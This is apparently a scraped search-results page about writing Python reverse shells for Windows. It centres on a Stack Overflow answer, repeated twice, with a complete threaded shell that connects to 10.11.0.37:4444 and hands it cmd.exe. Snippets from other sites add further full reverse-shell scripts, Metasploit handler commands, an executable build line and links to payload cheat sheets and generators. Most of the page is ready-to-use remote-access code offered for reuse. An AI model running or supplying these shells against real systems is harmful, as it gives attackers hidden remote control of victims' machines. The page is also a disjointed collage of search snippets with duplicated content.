(@rockstar: I think you and I are studying the same thing!)
Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...
Answer from Mark E. Haase on Stack Overflow Top answer 1 of 4
8
(@rockstar: I think you and I are studying the same thing!)
Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...
2 of 4
3
From the documentation for socket.fileno():
Under Windows the small integer returned by this method cannot be used where a file descriptor can be used (such as os.fdopen()). Unix does not have this limitation.
I do not think you can use os.dup2() on the return value of socket.fileno() on Windows unless you are using Cygwin.
I do not think you can do this as a one-liner on Windows because you need a while loop with multiple statements.
GitHub
github.com › TacticalCheerio › Python-Windows-Reverse-Shell
GitHub - TacticalCheerio/Python-Windows-Reverse-Shell: Python 3 Reverse Shell · GitHub
Reverse Shell written in Python3 - Modified version of trackmastersteve/shell · You can take advantage of post exploitation modules in Metasploit by using: msf> use exploit/multi/handler msf> set PAYLOAD [linux/shell_reverse_tcp | windows/shell_reverse_tcp] msf> set LHOST <Attacker IP> msf> set LPORT <Attacker Port> msf> set ExitOnSession false msf> run -j
Starred by 17 users
Forked by 5 users
Languages Python
netcat - python reverse shell for windows? - Stack Overflow
This works well on Linux but not on Windows. I compilie it using pyinstaller and when I run it on Windows i get a bad file descriptor on line 4. how do I make a reverse shell that works on Windows with this method? More on stackoverflow.com
Reverse shell using python - Stack Overflow
Typically a python process (and all its child processes) might be executed with privileges that only allow it to access files in its directory or in a larger sandbox (like all of the user's files, or all of the files in system). The minute details of sandboxing are very different in every OS. For starters, in windows try to call the reverse_shell... More on stackoverflow.com
Installing Python on Windows Reverse Shell
If you want install python to execute scripts just compile script to exe file. Else you can add python via send all needed libraries
More on reddit.com 3
1
August 4, 2022Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client in Python 3
So, telnet over http(s)? More on reddit.com
34
90
November 26, 2021Videos
15:34
How to Create a Reverse TCP Backdoor in Python | Ethical Hacking ...
01:43:33
Python TCP Reverse Shell Tutorial - EXE & Persistence & FUD & More!
08:28
Python Reverse Shell Tutorial - 5 - Testing the Program Locally ...
08:46
Python Reverse Shell Tutorial - 1 - Creating a Socket - YouTube
TCP Reverse Shell with Python 3 : Live demo with Kali and ...
04:49
Just a reverse shell with python - YouTube
Cybrary
cybrary.it › blog › creating-windows-exe-fud-reverse-shell-python
Creating a Windows EXE FUD Reverse Shell in Python | Cybrary
You can change the ip_addr and port_number variable to suit your servers IP and port.import socket, subprocessip_addr = '127.0.0.1'port_number = 4444s = socket.socket()while True:try:s.connect((ip_addr, port_number))breakexcept (socket.error, socket.timeout):continuewhile True:command_to_exe = s.recv(99999)result = subprocess.Popen(command_to_exe, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)result = result.stdout.read() + result.stderr.read()s.send(result)And that's all that's needed to create a reverse shell in python. ... Since python scripts can't run without the interpreter, you need to use a tool called pyinstaller ,which is NOT included with the default python installation, to convert the script into a windows executable.
GitHub
gist.github.com › mike10004 › 2291abeb8825b3f73fee
Reverse Shell Using Python · GitHub
Via http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/ with some style changes (to use classes instead of globals). ... a client: a Windows machine with Python installed (tested on Server 2012; probably works on 7 and 8 too)
The Python Code
thepythoncode.com › article › create-reverse-shell-python
How to Create a Reverse Shell in Python - The Python Code
A reverse shell is a program that executes local cmd.exe (for Windows) or bash/zsh (for Unix-like) commands and sends the output to a remote machine.
GitHub
github.com › TacticalCheerio › Python-Windows-Reverse-Shell › blob › master › reverse_shell.py
Python-Windows-Reverse-Shell/reverse_shell.py at master · TacticalCheerio/Python-Windows-Reverse-Shell
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
Author TacticalCheerio
PyRat
gerardbalaoro.github.io › PyRat
PyRat | A Simple Python 3 Reverse Shell Script
python server.py --port 58777 · Configure server settings inside config.ini. { "host":"127.0.0.1", "port":58777 } Run client script in another computer. Server script · pyinstaller server.py -F -y -i assets/icons/shell.ico --distpath "dist/PyRat" --name "PyRatServer" Client script, use the windowed option to prevent the script from launching a command window ·
Medium
medium.com › @songchai.d01 › how-to-create-a-reverse-shell-in-python-41fe75d88521
How to Create a Reverse Shell in Python | by Fa1c0n | Medium
April 11, 2020 - A reverse shell is a program that ... (for Windows) or bash/zsh (for Unix-Like) commands and sends the output to a remote machine. With a reverse shell, the target machine initiates the connection to the attacker machine, and the attacker’s ...
Medium
medium.com › @rietesh › python-reverse-shell-hack-your-neighbours-552561336ca8
PYTHON REVERSE SHELL (HACK YOUR NEIGHBOURS!!!) | by Rietesh Amminabhavi | Medium
January 22, 2019 - import socket import os import subprocess#1 target_host = "" target_port = 99#2 client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)client.connect((target_host,target_port))#3 while True: data = client.recv(1024) if data[:2].decode("utf-8") == 'cd': os.chdir(data[3:].decode("utf-8")) if len(data) > 0: cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE ) output_bytes = cmd.stdout.read() output_str = str(output_bytes, "utf-8") client.send(str.encode(output_str + str(os.getcwd()) + '$')) #print(output_str)client.close()
High on Coffee
highon.coffee › blog › reverse-shell-cheat-sheet
Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python
February 27, 2022 - Reverse Shell Cheat Sheet (Updated: 2024), a list of reverse shells for connecting back on Linux/Windows with PHP, Python, Powershell, nc (Netcat), JSP, Java, Bash, PS etc.
Payloads All The Things
swisskyrepo.github.io › InternalAllTheThings › cheatsheets › shell-reverse-cheatsheet
Reverse Shell Cheat Sheet - Internal All The Things
or use socat binary to get a fully tty reverse shell ... Alternatively, rustcat binary can automatically inject the TTY shell command. The shell will be automatically upgraded and the TTY size will be provided for manual adjustment.
GitHub
github.com › iteong › reverse-shell
GitHub - iteong/reverse-shell: Reverse Shell with Python 3 · GitHub
helping a friend with computer problems by reverse shell into his computer remotely on your computer.
Starred by 26 users
Forked by 15 users
Languages Python
Stack Overflow
stackoverflow.com › questions › 38385427 › reverse-shell-using-python
Reverse shell using python - Stack Overflow
Typically a python process (and all its child processes) might be executed with privileges that only allow it to access files in its directory or in a larger sandbox (like all of the user's files, or all of the files in system). The minute details of sandboxing are very different in every OS. For starters, in windows try to call the reverse_shell.py script from an admin-command line, in linux try executing as root 2016-07-15T11:42:00.47Z+00:00
pentestmonkey
pentestmonkey.net › cheat-sheet › shells › reverse-shell-cheat-sheet
Reverse Shell Cheat Sheet | pentestmonkey
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Reddit
reddit.com › r/hacking › installing python on windows reverse shell
r/hacking on Reddit: Installing Python on Windows Reverse Shell
August 4, 2022 -
Hey there first post, I'm using a Linux server to reverse shell into my windows machine where I'm trying to install python remotely, so far I've found only one way to install python through powershell which is through choco. If anybody can come up with any other way of installing python through my reverse shell, please feel free to do so in the comments! :)
GitHub
github.com › swisskyrepo › PayloadsAllTheThings › blob › master › Methodology and Resources › Reverse Shell Cheatsheet.md
PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings
Automatic Reverse Shell Generator · Bash TCP · Bash UDP · C · Dart · Golang · Groovy Alternative 1 · Groovy · Java Alternative 1 · Java Alternative 2 · Java · Lua · Ncat · Netcat OpenBsd · Netcat BusyBox · Netcat Traditional · NodeJS · OGNL · OpenSSL · Perl · PHP · Powershell · Python · Ruby · Rust · Socat · Telnet · War · Meterpreter Shell · Windows Staged reverse TCP ·
Author swisskyrepo
Medium
medium.com › @kiptryin › reverse-shells-101-gaining-shell-access-with-python-and-bash-61faf539a822
Reverse Shells 101: Gaining Shell Access with Python and Bash | by Kiptryin | Medium
July 28, 2025 - Reverse shells are powerful tools when used responsibly in penetration testing and red teaming. In this walkthrough, we demonstrated simple yet effective payloads using Bash and Python to gain shell access to a remote machine.
GitHub
github.com › t3l3machus › hoaxshell
GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. · GitHub
sudo python3 hoaxshell.py -s <your_ip> -g · Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc). Use any of the payload variations with the -cm (--constraint-mode) option to generate a payload that works even if the victim is configured to run PS in Constraint Language mode. By using this option, you sacrifice a bit of your reverse shell's stdout decoding accuracy.
Starred by 3.4K users
Forked by 526 users
Languages Python 87.7% | PowerShell 12.3%
Null Byte
null-byte.wonderhowto.com › how-to › reverse-shell-using-python-0163875
How to Reverse Shell Using Python - Null Byte - WonderHowTo
August 16, 2015 - You'll have to type SHELL before the respective DOS command. That's it. It should be noted that not all commands would work without multi threading the script. RMDIR, MKDIR, DEL, START, and some other commands will require to start another thread.